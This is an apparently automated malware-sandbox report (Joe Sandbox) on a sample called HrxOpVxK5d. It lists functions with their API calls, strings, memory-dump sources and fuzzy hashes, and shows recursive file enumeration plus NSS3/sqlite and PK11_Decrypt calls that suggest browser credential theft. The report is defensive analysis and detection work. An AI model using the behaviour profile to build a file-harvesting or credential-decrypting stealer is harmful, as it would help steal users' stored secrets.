Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413B1C
FindFirstFileA.KERNEL32(?,?), ref: 00413B33
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

%s\*, xrefs: 00413B10
%s%s, xrefs: 00413CFD
%s\%s, xrefs: 00413BCA
%s\%s\%s, xrefs: 00413C9A
q?A, xrefs: 00413ED2, 00413E95, 00413DB9, 00413B59, 00413DBC, 00413E98
%s\%s, xrefs: 00413CBF

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
API String ID: 1125553467-4052298153
Opcode ID: 9222bd0bcc612a6c34688b5fc55252f30b659d4c2d682612f09d014b6734d0d0
Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
Opcode Fuzzy Hash: 9222bd0bcc612a6c34688b5fc55252f30b659d4c2d682612f09d014b6734d0d0
Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66

Function 6CF6E6E0 Relevance: 44.2, APIs: 17, Strings: 8, Instructions: 452stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,6CF6DA6A,?,00000000,?,?), ref: 6CF6E6FF
sqlite3_initialize.NSS3(?,?,00000000,?,6CF6DA6A,?,00000000,?,?), ref: 6CF6E76B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(6CF6DA6F,///,00000003,?,?,00000000), ref: 6CF6E7AC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(6CF6DA71,///,00000003), ref: 6CF6E7C8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF6E8E8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF6E908
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CF6E921
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF6E978
memcmp.VCRUNTIME140(?,?,6CF6DA6A), ref: 6CF6E991
sqlite3_initialize.NSS3(?,?,00000000,?,6CF6DA6A,?,00000000,?,?), ref: 6CF6E9FA
memcpy.VCRUNTIME140(?,6CF6DA6A,00000000,?,?,00000000), ref: 6CF6EA3A
sqlite3_initialize.NSS3(?,?,00000000), ref: 6CF6EA55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF6EABA
sqlite3_mprintf.NSS3(no such %s mode: %s,6D0BE039,?), ref: 6CF6EB9F
sqlite3_free.NSS3(000000FC,?,?,?,?,00000000), ref: 6CF6EBDB
sqlite3_mprintf.NSS3(no such vfs: %s,?,?,?,00000000), ref: 6CF6EC1A
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,//localhost/,0000000C), ref: 6CF6EC2E

Strings

cach, xrefs: 6CF6E93A
no such %s mode: %s, xrefs: 6CF6EB9A
///, xrefs: 6CF6E7A3, 6CF6E7C2
mode, xrefs: 6CF6EC58
%s mode not allowed: %s, xrefs: 6CF6ECB7
//localhost/, xrefs: 6CF6EC26
no such vfs: %s, xrefs: 6CF6EC15
file, xrefs: 6CF6E738

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: strlen$sqlite3_initializestrncmp$sqlite3_mprintf$memcmpmemcpysqlite3_freestrcmp
String ID: %s mode not allowed: %s$///$//localhost/$cach$file$mode$no such %s mode: %s$no such vfs: %s
API String ID: 3798319595-1352301890
Opcode ID: 1f4d5c0cf9ba35100b4a0c3c4f54b46e363a8dbaff85dca70c776986d791f0a3
Instruction ID: 3b49f6d77b771ba18cbc0f004b64521673cf1abb216b2e05169cc2fcab17eec9
Opcode Fuzzy Hash: 1f4d5c0cf9ba35100b4a0c3c4f54b46e363a8dbaff85dca70c776986d791f0a3
Instruction Fuzzy Hash: EBF1F273E052558FEB10CFA6CC817AFBBB1BF06308F284129D866ABA81D7359905C7D1

Function 6CF28460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6CF284FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6CF288BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6CF288CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF288E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6CF288F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF2894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF2895F
sqlite3_randomness.NSS3(00000008,?), ref: 6CF28914

Part of subcall function 6CF131C0: sqlite3_initialize.NSS3 ref: 6CF131D6

sqlite3_randomness.NSS3(00000004,?), ref: 6CF28A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF28A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CF28A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF28B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CF28B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6CF28BAD

Strings

cannot limit WAL size: %s, xrefs: 6CF29188

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: 39526409c5168c8cd4f827079fbc7ecdc73014d751ea68a26b3f5c1ddbeb451a
Instruction ID: 960d43ce948649ab7c9bc7698bbf9b72c90b88297423b81278378ed4826080ac
Opcode Fuzzy Hash: 39526409c5168c8cd4f827079fbc7ecdc73014d751ea68a26b3f5c1ddbeb451a
Instruction Fuzzy Hash: B3926E72A083019FD704CF69C880B5ABBF1FF88318F19892DE9999B751D735E945CB82

Function 6CFEAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CFEACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CFEACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CFEACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CFEAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CFEADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFEADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFEADF0

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFEB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFEB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFEB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFEB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CFEB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFEB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFEB40C

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: f7f55d8eebd6bf7797f7e33cddeba858f456b9348e51b5f4fdd48978ecdb806d
Instruction ID: 5d344dc65ac939c939b47cfe3f09a9c7fee2be4b4c90259de99f5c389b848795
Opcode Fuzzy Hash: f7f55d8eebd6bf7797f7e33cddeba858f456b9348e51b5f4fdd48978ecdb806d
Instruction Fuzzy Hash: EF22A071904301AFE710CF14CC44B9A77E1AF8830CF29896CE9595F7A2E772E859CB96

Function 6CF72560 Relevance: 37.3, APIs: 10, Strings: 11, Instructions: 533stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CF6F9C9,?,6CF6F4DA,6CF6F9C9,?,?,6CF3369A), ref: 6CF0CA7A
Part of subcall function 6CF0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CF0CB26

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF725B2
memset.VCRUNTIME140(00000000,00000000,00000079), ref: 6CF725DE
sqlite3_snprintf.NSS3(-0000000F,00000068,%s-shm,?), ref: 6CF72604
sqlite3_initialize.NSS3 ref: 6CF7269D
sqlite3_uri_parameter.NSS3(?,readonly_shm), ref: 6CF726D6
sqlite3_initialize.NSS3 ref: 6CF7289F
EnterCriticalSection.KERNEL32(?), ref: 6CF729CD
LeaveCriticalSection.KERNEL32(?), ref: 6CF72A26
sqlite3_free.NSS3(?), ref: 6CF72B30

Strings

winShmMap3, xrefs: 6CF72C08, 6CF72C3D
winShmMap2, xrefs: 6CF72BD0
m, xrefs: 6CF727CB
Pm, xrefs: 6CF72A51, 6CF72A90, 6CF72B0A, 6CF72B66, 6CF72BB0, 6CF72BE0, 6CF72C1A
%s-shm, xrefs: 6CF725FD
0m, xrefs: 6CF72AE9
winFileSize, xrefs: 6CF72A7D
winShmMap1, xrefs: 6CF72AB0
m, xrefs: 6CF72900
winOpenShm, xrefs: 6CF72B7E
readonly_shm, xrefs: 6CF726CE

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_initialize$memsetsqlite3_freesqlite3_snprintfsqlite3_uri_parameterstrlen
String ID: m$ m$%s-shm$0m$Pm$readonly_shm$winFileSize$winOpenShm$winShmMap1$winShmMap2$winShmMap3
API String ID: 3867263885-1242340256
Opcode ID: 46cdeef3696bf3bd5c8672a568be4b9e521456adecbb57823d3dca4917769d3e
Instruction ID: 35ce1f5d564e761b9662e0bb54f1d02fd36e9af0eded4f7ae1f92d6ff23cef0b
Opcode Fuzzy Hash: 46cdeef3696bf3bd5c8672a568be4b9e521456adecbb57823d3dca4917769d3e
Instruction Fuzzy Hash: 9D12BE71A04201DFEB18CF24E888B6AB7F2FF89714F15452EE84597740DB36E945CBA2

Function 6CF74420 Relevance: 34.4, APIs: 10, Strings: 9, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF74EE3

Strings

non-deterministic use of %s() in %s, xrefs: 6CF74D71, 6CF74EA4
weekday , xrefs: 6CF754AB
a CHECK constraint, xrefs: 6CF74D62, 6CF74D6D, 6CF74E95, 6CF74EA0
start of , xrefs: 6CF7517A
second, xrefs: 6CF74BCA
a generated column, xrefs: 6CF74D58, 6CF74E8B
an index, xrefs: 6CF74D53, 6CF74E86
-, xrefs: 6CF74FBA
40f-21a-21d, xrefs: 6CF744D0

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $weekday
API String ID: 39653677-183924012
Opcode ID: 1cba3a89b78f09381cebceaf27f07926f479f864e7c0da4d3d349707e2ff2db7
Instruction ID: c09ffeb20a4aa29a0869af08dde55a854fd707d68ecbccd7397d65a69845c915
Opcode Fuzzy Hash: 1cba3a89b78f09381cebceaf27f07926f479f864e7c0da4d3d349707e2ff2db7
Instruction Fuzzy Hash: 25A235316087848FD721CF34D060767BBE2AF86318F14865EE8D59B792E735D886CB62

Function 6CF6ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CF6ED38

Part of subcall function 6CF04F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF04FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CF6EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CF6EFE4

Part of subcall function 6D02DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CF05001,?,00000003,00000000), ref: 6D02DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CF6F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CF6F129
sqlite3_mprintf.NSS3(optimize), ref: 6CF6F1D1
sqlite3_free.NSS3(?), ref: 6CF6F368

Strings

matchinfo, xrefs: 6CF6F04F, 6CF6F082, 6CF6F0C2, 6CF6F0F2, 6CF6F124, 6CF6F169
fts4aux, xrefs: 6CF6ECF9
simple, xrefs: 6CF6ED79
fts3_tokenizer, xrefs: 6CF6EE1A, 6CF6EEA8
unicode61, xrefs: 6CF6EDB5
fts3, xrefs: 6CF6F247
snippet, xrefs: 6CF6EF05, 6CF6EF37, 6CF6EF7C
offsets, xrefs: 6CF6EFAF, 6CF6EFDF, 6CF6F01F
fts3tokenize, xrefs: 6CF6F30F
porter, xrefs: 6CF6ED97
fts4, xrefs: 6CF6F2AD
optimize, xrefs: 6CF6F199, 6CF6F1CC, 6CF6F211

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 1f7d66711c48012593b895fad16b8bc9155a0682e67e599dca3e3c1e51622b92
Instruction ID: 8b4fcaae06997f017346e6dbf3b026f55fb8fccab80614d9d1626c03e229c32a
Opcode Fuzzy Hash: 1f7d66711c48012593b895fad16b8bc9155a0682e67e599dca3e3c1e51622b92
Instruction Fuzzy Hash: B70212B2A083015BE7049F32D88572F76B2BFC9708F24853DD85A87B41EB75E946C792

Function 6CFAA4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6CF828AD,pkcs11:,00000007), ref: 6CFAA501
PORT_Strdup_Util.NSS3(6CF828AD), ref: 6CFAA514

Part of subcall function 6CFE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CF82AF5,?,?,?,?,?,6CF80A1B,00000000), ref: 6CFE0F1A
Part of subcall function 6CFE0F10: malloc.MOZGLUE(00000001), ref: 6CFE0F30
Part of subcall function 6CFE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CFE0F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6CFAA529
PK11_GetInternalKeySlot.NSS3 ref: 6CFAA60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6CFAA74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6CFAA777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFAA80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6CFAA82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6CFAA952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFAA9C3

Part of subcall function 6CFD0960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6CFAA8F5,00000000,?,00000010), ref: 6CFD097E
Part of subcall function 6CFD0960: memcmp.VCRUNTIME140(?,00000000,6CFAA8F5,00000010), ref: 6CFD098D

free.MOZGLUE(00000000), ref: 6CFAAB18
strchr.VCRUNTIME140(?,00000040), ref: 6CFAAB40
free.MOZGLUE(?), ref: 6CFAABE1

Part of subcall function 6CFA4170: TlsGetValue.KERNEL32(?,6CF828AD,00000000,?,6CFAA793,?,00000000), ref: 6CFA419F
Part of subcall function 6CFA4170: EnterCriticalSection.KERNEL32(0000001C), ref: 6CFA41AF
Part of subcall function 6CFA4170: PR_Unlock.NSS3(?), ref: 6CFA41D4

Strings

token, xrefs: 6CFAA875
manufacturer, xrefs: 6CFAA8A2
object, xrefs: 6CFAA5CF
pkcs11:, xrefs: 6CFAA4FB
model, xrefs: 6CFAA8CF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: 616a36978d9c6f2522456bcb40f09129618d925eea1bc7efa7ba6a25d0005533
Instruction ID: d15d850afdcd2daf70dd6f83976df38491aac46313b4cac16c1a5a3ecf86efd2
Opcode Fuzzy Hash: 616a36978d9c6f2522456bcb40f09129618d925eea1bc7efa7ba6a25d0005533
Instruction Fuzzy Hash: 2E0284B5D00214DFFF219B619C41BAEB6B5AF05208F1540B4E90CA6752FB319E5ACFA2

Function 6CFAE6E0 Relevance: 30.6, APIs: 20, Instructions: 581memorythreadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CFAE8AB
EnterCriticalSection.KERNEL32(?), ref: 6CFAE8BF
PORT_Alloc_Util.NSS3(0000000C), ref: 6CFAEA30
PK11_Encrypt.NSS3(?,?,?,?,?,?,00000000,?), ref: 6CFAEA6A
PORT_Alloc_Util.NSS3(?), ref: 6CFAEB0D
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CFAEB23
memcpy.VCRUNTIME140(?,?), ref: 6CFAEB38
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CFAEB50
PR_SetError.NSS3(00000000,00000000), ref: 6CFAEC0F
PR_Unlock.NSS3(?), ref: 6CFAEC68
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CFAEC7D
PR_Unlock.NSS3(?), ref: 6CFAEC9C
PK11_Decrypt.NSS3(?,?,?,?,?,?,00000000,?), ref: 6CFAECCF
PR_GetCurrentThread.NSS3 ref: 6CFAED02
PK11_Decrypt.NSS3(?,00001087,?,?,?,?,?,?), ref: 6CFAED6F
PK11_Encrypt.NSS3(?,00001087,?,?,?,?,?,?), ref: 6CFAEDB7
memcpy.VCRUNTIME140(?,?,?), ref: 6CFAEDF6
memcpy.VCRUNTIME140(?,?), ref: 6CFAEE12
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CFAEE2B

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

free.MOZGLUE(?), ref: 6CFAEE43

Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707AD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707CD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707D6
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF0204A), ref: 6CF707E4
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,6CF0204A), ref: 6CF70864
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF70880
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,6CF0204A), ref: 6CF708CB
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708D7
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708FB

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$ErrorK11_memcpy$Alloc_DecryptEncryptUnlockUtilcalloc$CriticalCurrentEnterSectionThreadfree
String ID:
API String ID: 1743700497-0
Opcode ID: 02f5182a8fac6d2bf1276611ad39d391b666e315f8e97f972c85bf04568d6e4c
Instruction ID: 5e2dbc722690cba9b3052ab127f956e5ea634ce9c56b2ee688860dea683e07ae
Opcode Fuzzy Hash: 02f5182a8fac6d2bf1276611ad39d391b666e315f8e97f972c85bf04568d6e4c
Instruction Fuzzy Hash: 463234B1604305DFDB14CF99C880A9ABBF5BF88308F14892DE99987751D331E956CF92

Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
HeapAlloc.KERNEL32(00000000), ref: 004147D7
wsprintfA.USER32 ref: 004147F6
FindFirstFileA.KERNEL32(?,?), ref: 0041480D
StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
FindClose.KERNEL32(000000FF), ref: 004148F0
lstrcatA.KERNEL32(?,02D471A0,?,00000104), ref: 00414915
lstrcatA.KERNEL32(?,02D46050), ref: 00414928
lstrlenA.KERNEL32(?), ref: 00414935
lstrlenA.KERNEL32(?), ref: 00414946

Strings

%s\*, xrefs: 004147EA
%s\%s, xrefs: 0041486B

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

